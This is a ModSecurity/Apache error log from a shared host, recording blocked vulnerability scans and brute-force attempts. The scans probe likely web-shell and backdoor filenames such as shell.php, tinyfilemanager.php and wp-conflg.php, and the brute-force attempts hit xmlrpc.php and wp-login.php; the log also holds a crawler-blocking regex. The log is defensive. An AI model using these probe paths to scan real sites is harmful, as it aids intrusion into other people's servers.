[Tue May 26 17:18:00.020002 2026] [security2:error] [pid 869189:tid 869334] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIb9B5TZSn88J_orr2cQAAAA4"]
[Tue May 26 17:18:00.244427 2026] [security2:error] [pid 869189:tid 869378] [client 91.230.225.117:22583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/tinyfilemanager.php"] [unique_id "ahWIcNB5TZSn88J_orr2fQAAADo"]
[Tue May 26 17:18:00.503962 2026] [security2:error] [pid 869189:tid 869377] [client 20.205.111.246:8847] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/ss.php"] [unique_id "ahWIcNB5TZSn88J_orr2hwAAADk"]
[Tue May 26 17:18:00.645514 2026] [security2:error] [pid 869189:tid 869365] [client 223.235.98.214:32353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIcNB5TZSn88J_orr2jAAAAC0"]
[Tue May 26 17:18:00.646276 2026] [security2:error] [pid 869189:tid 869365] [client 223.235.98.214:32353] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIcNB5TZSn88J_orr2jAAAAC0"]
[Tue May 26 17:18:01.204916 2026] [security2:error] [pid 869189:tid 869344] [client 20.205.111.246:3546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/sts.php"] [unique_id "ahWIcdB5TZSn88J_orr2nAAAABg"]
[Tue May 26 17:18:01.652189 2026] [security2:error] [pid 869189:tid 869348] [client 185.92.25.51:39541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/js/bas.php"] [unique_id "ahWIcdB5TZSn88J_orr2tgAAABw"]
[Tue May 26 17:18:01.754359 2026] [security2:error] [pid 869189:tid 869363] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIcdB5TZSn88J_orr2oQAAACs"]
[Tue May 26 17:18:01.867493 2026] [security2:error] [pid 869189:tid 869425] [client 20.205.111.246:8355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/shell.php"] [unique_id "ahWIcdB5TZSn88J_orr2uQAAAGk"]
[Tue May 26 17:18:02.011124 2026] [security2:error] [pid 869189:tid 869441] [client 185.192.71.176:31463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 176.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/.well-known/pki-validation/moon.php"] [unique_id "ahWIctB5TZSn88J_orr2vQAAAHk"]
[Tue May 26 17:18:02.417249 2026] [security2:error] [pid 869189:tid 869427] [client 91.230.225.117:48185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/file.php"] [unique_id "ahWIctB5TZSn88J_orr2zgAAAGs"]
[Tue May 26 17:18:02.531553 2026] [security2:error] [pid 869189:tid 869332] [client 20.205.111.246:10114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/setup-config.php"] [unique_id "ahWIctB5TZSn88J_orr20QAAAAw"]
[Tue May 26 17:18:02.954104 2026] [security2:error] [pid 869189:tid 869342] [client 91.230.225.121:42557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 121.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-includes/js/index.php"] [unique_id "ahWIctB5TZSn88J_orr25QAAABY"]
[Tue May 26 17:18:03.142596 2026] [security2:error] [pid 869189:tid 869376] [client 203.194.101.7:58624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIc9B5TZSn88J_orr27AAAADg"]
[Tue May 26 17:18:03.142781 2026] [security2:error] [pid 869189:tid 869376] [client 203.194.101.7:58624] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIc9B5TZSn88J_orr27AAAADg"]
[Tue May 26 17:18:03.239297 2026] [security2:error] [pid 869189:tid 869397] [client 20.205.111.246:13042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahWIc9B5TZSn88J_orr27gAAAE0"]
[Tue May 26 17:18:03.397132 2026] [security2:error] [pid 869189:tid 869325] [client 185.192.71.181:31255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/upgrade/item.php"] [unique_id "ahWIc9B5TZSn88J_orr27wAAAAU"]
[Tue May 26 17:18:03.802895 2026] [security2:error] [pid 869189:tid 869355] [client 185.92.25.51:48863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/buy.php"] [unique_id "ahWIc9B5TZSn88J_orr3BQAAACM"]
[Tue May 26 17:18:03.922297 2026] [security2:error] [pid 869189:tid 869400] [client 20.205.111.246:12446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/up.php"] [unique_id "ahWIc9B5TZSn88J_orr3CQAAAFA"]
[Tue May 26 17:18:04.186959 2026] [security2:error] [pid 869189:tid 869416] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIc9B5TZSn88J_orr3AAAAAGA"]
[Tue May 26 17:18:04.292565 2026] [security2:error] [pid 869189:tid 869333] [client 91.230.225.134:40189] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/languages/wp-conflg.php"] [unique_id "ahWIdNB5TZSn88J_orr3FQAAAA0"]
[Tue May 26 17:18:04.631041 2026] [security2:error] [pid 869189:tid 869321] [client 20.205.111.246:10457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/ultra.php"] [unique_id "ahWIdNB5TZSn88J_orr3HwAAAAE"]
[Tue May 26 17:18:05.369611 2026] [security2:error] [pid 869189:tid 869423] [client 20.205.111.246:4313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/vv.php"] [unique_id "ahWIddB5TZSn88J_orr3PQAAAGc"]
[Tue May 26 17:18:05.497330 2026] [security2:error] [pid 869189:tid 869389] [client 50.114.1.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWIdNB5TZSn88J_orr3KAAAAEU"]
[Tue May 26 17:18:05.692149 2026] [security2:error] [pid 869189:tid 869338] [client 185.92.25.53:36813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/themes/classwithtostring.php"] [unique_id "ahWIddB5TZSn88J_orr3SAAAABI"]
[Tue May 26 17:18:06.097282 2026] [security2:error] [pid 869189:tid 869322] [client 20.205.111.246:9819] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/V5.php"] [unique_id "ahWIdtB5TZSn88J_orr3UQAAAAI"]
[Tue May 26 17:18:06.841471 2026] [security2:error] [pid 869189:tid 869420] [client 18.192.166.72:53148] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWIdtB5TZSn88J_orr3cQAAAGQ"], referer: https://thegoodsporting.com
[Tue May 26 17:18:06.843451 2026] [security2:error] [pid 869189:tid 869393] [client 20.205.111.246:10433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/wp-user.php"] [unique_id "ahWIdtB5TZSn88J_orr3cgAAAEk"]
[Tue May 26 17:18:06.987253 2026] [security2:error] [pid 869189:tid 869366] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIdtB5TZSn88J_orr3ZQAAAC4"]
[Tue May 26 17:18:07.080561 2026] [security2:error] [pid 869189:tid 869251] [remote 103.11.102.106:47120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWIdtB5TZSn88J_orr3cwAADDw"]
[Tue May 26 17:18:07.088309 2026] [autoindex:error] [pid 869189:tid 869384] [client 152.59.41.98:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/gallery
[Tue May 26 17:18:07.239062 2026] [security2:error] [pid 869189:tid 869341] [client 185.192.71.171:37169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/elementor/wp-wjvngrh.php"] [unique_id "ahWId9B5TZSn88J_orr3egAAABU"]
[Tue May 26 17:18:07.597595 2026] [security2:error] [pid 869189:tid 869338] [client 20.205.111.246:9897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahWId9B5TZSn88J_orr3hwAAABI"]
[Tue May 26 17:18:07.685102 2026] [security2:error] [pid 869189:tid 869333] [client 185.192.71.166:34553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-includes/IXR/fix.php7"] [unique_id "ahWId9B5TZSn88J_orr3iwAAAA0"]
[Tue May 26 17:18:08.304759 2026] [security2:error] [pid 869189:tid 869368] [client 20.205.111.246:10151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWIeNB5TZSn88J_orr3mgAAADA"]
[Tue May 26 17:18:08.957295 2026] [security2:error] [pid 869189:tid 869320] [client 114.119.148.237:58951] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWIeNB5TZSn88J_orr3vAAAAAA"], referer: http://haddingtonwines.com/cart?remove_item=0fd7e4f42a8b4b4ef33394d35212b13e
[Tue May 26 17:18:09.073907 2026] [security2:error] [pid 869189:tid 869386] [client 20.205.111.246:6343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/worksec.php"] [unique_id "ahWIedB5TZSn88J_orr3vwAAAEI"]
[Tue May 26 17:18:09.132103 2026] [security2:error] [pid 869189:tid 869218] [remote 74.7.241.58:55616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWIedB5TZSn88J_orr3xwAACBs"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:18:09.414449 2026] [security2:error] [pid 869189:tid 869395] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIeNB5TZSn88J_orr3vgAAAEs"]
[Tue May 26 17:18:09.650472 2026] [security2:error] [pid 869189:tid 869262] [remote 88.198.165.116:33548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWIedB5TZSn88J_orr3zgAADkc"]
[Tue May 26 17:18:09.795542 2026] [security2:error] [pid 869189:tid 869329] [client 20.205.111.246:2438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/wp-themes.php"] [unique_id "ahWIedB5TZSn88J_orr33gAAAAk"]
[Tue May 26 17:18:10.553837 2026] [security2:error] [pid 869189:tid 869342] [client 20.205.111.246:7739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/wp-signin.php"] [unique_id "ahWIetB5TZSn88J_orr4AQAAABY"]
[Tue May 26 17:18:11.089919 2026] [security2:error] [pid 869189:tid 869345] [client 185.191.171.1:55022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-12-16/list/"] [unique_id "ahWIe9B5TZSn88J_orr4JQAAABk"]
[Tue May 26 17:18:11.090083 2026] [security2:error] [pid 869189:tid 869345] [client 185.191.171.1:55022] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-12-16/list/"] [unique_id "ahWIe9B5TZSn88J_orr4JQAAABk"]
[Tue May 26 17:18:11.295006 2026] [security2:error] [pid 869189:tid 869357] [client 223.235.98.214:13606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIe9B5TZSn88J_orr4JgAAACU"]
[Tue May 26 17:18:11.295184 2026] [security2:error] [pid 869189:tid 869357] [client 223.235.98.214:13606] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIe9B5TZSn88J_orr4JgAAACU"]
[Tue May 26 17:18:11.313843 2026] [security2:error] [pid 869189:tid 869408] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIetB5TZSn88J_orr4EwAAAFg"]
[Tue May 26 17:18:11.322228 2026] [security2:error] [pid 869189:tid 869409] [client 20.205.111.246:3553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/wp-blog-header.php"] [unique_id "ahWIe9B5TZSn88J_orr4KQAAAFk"]
[Tue May 26 17:18:11.326041 2026] [security2:error] [pid 869189:tid 869343] [client 93.175.45.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWIe9B5TZSn88J_orr4IAAAABc"]
[Tue May 26 17:18:12.154035 2026] [security2:error] [pid 869189:tid 869339] [client 152.59.41.98:50181] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWIfNB5TZSn88J_orr4RQAAE0s"], referer: https://www.ucdc.co.in/aboutus/about-sardardham
[Tue May 26 17:18:12.167981 2026] [security2:error] [pid 869189:tid 869271] [remote 154.66.198.148:14250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIe9B5TZSn88J_orr4PwAADVA"]
[Tue May 26 17:18:12.277553 2026] [security2:error] [pid 869189:tid 869329] [client 20.205.111.246:10935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahWIfNB5TZSn88J_orr4TAAAAAk"]
[Tue May 26 17:18:12.350329 2026] [security2:error] [pid 869189:tid 869382] [client 104.28.228.58:62360] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "consultio.taotechservices.com"] [uri "/ms-themes.php"] [unique_id "ahWIfNB5TZSn88J_orr4TQAAAD4"]
[Tue May 26 17:18:13.051477 2026] [security2:error] [pid 869189:tid 869334] [client 20.205.111.246:10883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/wsa.php"] [unique_id "ahWIfdB5TZSn88J_orr4WwAAAA4"]
[Tue May 26 17:18:13.115330 2026] [security2:error] [pid 869189:tid 869426] [client 91.132.125.203:31551] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWIfNB5TZSn88J_orr4VAAAAGo"]
[Tue May 26 17:18:13.757670 2026] [security2:error] [pid 869189:tid 869362] [client 203.194.101.7:58957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIfdB5TZSn88J_orr4awAAACo"]
[Tue May 26 17:18:13.757860 2026] [security2:error] [pid 869189:tid 869362] [client 203.194.101.7:58957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIfdB5TZSn88J_orr4awAAACo"]
[Tue May 26 17:18:13.856144 2026] [security2:error] [pid 869189:tid 869330] [client 20.205.111.246:6474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahWIfdB5TZSn88J_orr4dQAAAAo"]
[Tue May 26 17:18:14.091913 2026] [security2:error] [pid 869189:tid 869350] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIfdB5TZSn88J_orr4bgAAAB4"]
